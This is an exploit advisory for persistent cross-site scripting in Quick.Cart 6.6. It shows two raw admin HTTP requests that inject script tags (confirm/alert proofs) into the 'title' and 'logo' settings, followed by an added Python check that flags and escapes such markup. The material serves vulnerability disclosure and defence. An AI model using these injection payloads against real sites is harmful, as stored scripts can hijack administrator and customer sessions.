QUICK CART V6.6 Persistent XSS

# Exploit Title: QUICK CART V6.6 Persistent XSS
# Date: 19/01/2016
# Exploit Author: Mr T
# Exploit Authors Website: http://www.securitypentester.ninja
# Vulnerable Version: V6.6
# Tested on: Linux
# Vendor doesn’t consider this a vulnerability.

Persistent XSS

Issue No # 1
Persistent XSS on parameter “title”
Request Sent:

POST /admin.php?p=tools-config HTTP/1.1
Host: 192.168.2.100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.100/admin.php?p=tools-config&sOption=login-pass
Cookie: PHPSESSID=ijfqciqrrhme9g3rghoj7oatr3; sLogin=admin; bLicense66=true
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 824

sOption=save+%C2%BB&title=50a77%3c%2ftitle%3e%3cscript%3econfirm(1)%3c%2fscript%3e6f169&default_lang=en&admin_lang=en&skin=default&sorting_products=true&currency_symbol=EUR&hidden_shows=false&display_expanded_menu=true&language_in_url=false&start_page=6&basket_page=15&order_page=16&order_print=18&rules_page=4&page_search=17&admin_list=25&products_list=6&change_files_names=false&delete_unused_files=true&wysiwyg=true&send_customer_order_details=false&display_subcategory_products=true&remember_basket=false&description=Freeware%2C+fast%2C+simple%2C+and+multilingual+shopping+cart+system.+It+is+based+on+Flat+Files%2C+uses+templates+system%2C+valid+XHTML+1.1+and+WAI&logo=%3C%2Fh1%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Ch1%3E&slogan=Fast+and+simple+shopping+cart&foot_info=All+rights+reserved&login=admin&pass=admin&orders_email=

 

Issue No # 2
Persistent XSS on parameter “logo”
Request Sent:

POST /admin.php?p=tools-config HTTP/1.1
Host: 192.168.2.100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.100/admin.php?p=tools-config&sOption=login-pass
Cookie: PHPSESSID=ijfqciqrrhme9g3rghoj7oatr3; sLogin=admin; bLicense66=true
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 824

sOption=save+%C2%BB&title=Quick.Cart+-+fast+and+simple+shopping+cart&default_lang=en&admin_lang=en&skin=default&sorting_products=true&currency_symbol=EUR&hidden_shows=false&display_expanded_menu=true&language_in_url=false&start_page=6&basket_page=15&order_page=16&order_print=18&rules_page=4&page_search=17&admin_list=25&products_list=6&change_files_names=false&delete_unused_files=true&wysiwyg=true&send_customer_order_details=false&display_subcategory_products=true&remember_basket=false&description=Freeware%2C+fast%2C+simple%2C+and+multilingual+shopping+cart+system.+It+is+based+on+Flat+Files%2C+uses+templates+system%2C+valid+XHTML+1.1+and+WAI&logo=%3C%2Fh1%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Ch1%3E&slogan=Fast+and+simple+shopping+cart&foot_info=All+rights+reserved&login=admin&pass=admin&orders_email=
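
Defender-side check for the two requests above, added here as an example (not part of the original advisory and not Quick.Cart code): it decodes a tools-config form body, flags settings that carry HTML tags, and shows the "title" value HTML-encoded at output. The function names, the PLAIN_TEXT_FIELDS list and the assumption that these settings are meant to hold plain text are assumptions; the sample body is abbreviated from the requests above.

```python
import html
import re
from urllib.parse import parse_qsl

# Constructed sample: the "title" value from Issue 1 and the "logo" value from
# Issue 2, with most of the other form fields trimmed for brevity.
SAMPLE_BODY = (
    "sOption=save+%C2%BB"
    "&title=50a77%3c%2ftitle%3e%3cscript%3econfirm(1)%3c%2fscript%3e6f169"
    "&default_lang=en&skin=default"
    "&logo=%3C%2Fh1%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Ch1%3E"
    "&slogan=Fast+and+simple+shopping+cart"
    "&foot_info=All+rights+reserved"
)

# Assumption: these settings are rendered into the page as plain text.
PLAIN_TEXT_FIELDS = {"title", "logo", "slogan", "foot_info", "description"}

# Matches the start of an opening tag, closing tag, comment or doctype.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z!]")


def find_markup(body):
    """Return {field: decoded value} for plain-text fields containing HTML tags."""
    hits = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in PLAIN_TEXT_FIELDS and TAG_RE.search(value):
            hits[name] = value
    return hits


def render_title(value):
    """Encode on output so a stored value stays text inside <title>."""
    return "<title>" + html.escape(value, quote=True) + "</title>"


if __name__ == "__main__":
    flagged = find_markup(SAMPLE_BODY)
    for field, value in flagged.items():
        print(f"markup in '{field}': {value!r}")
    print(render_title(flagged["title"]))
```
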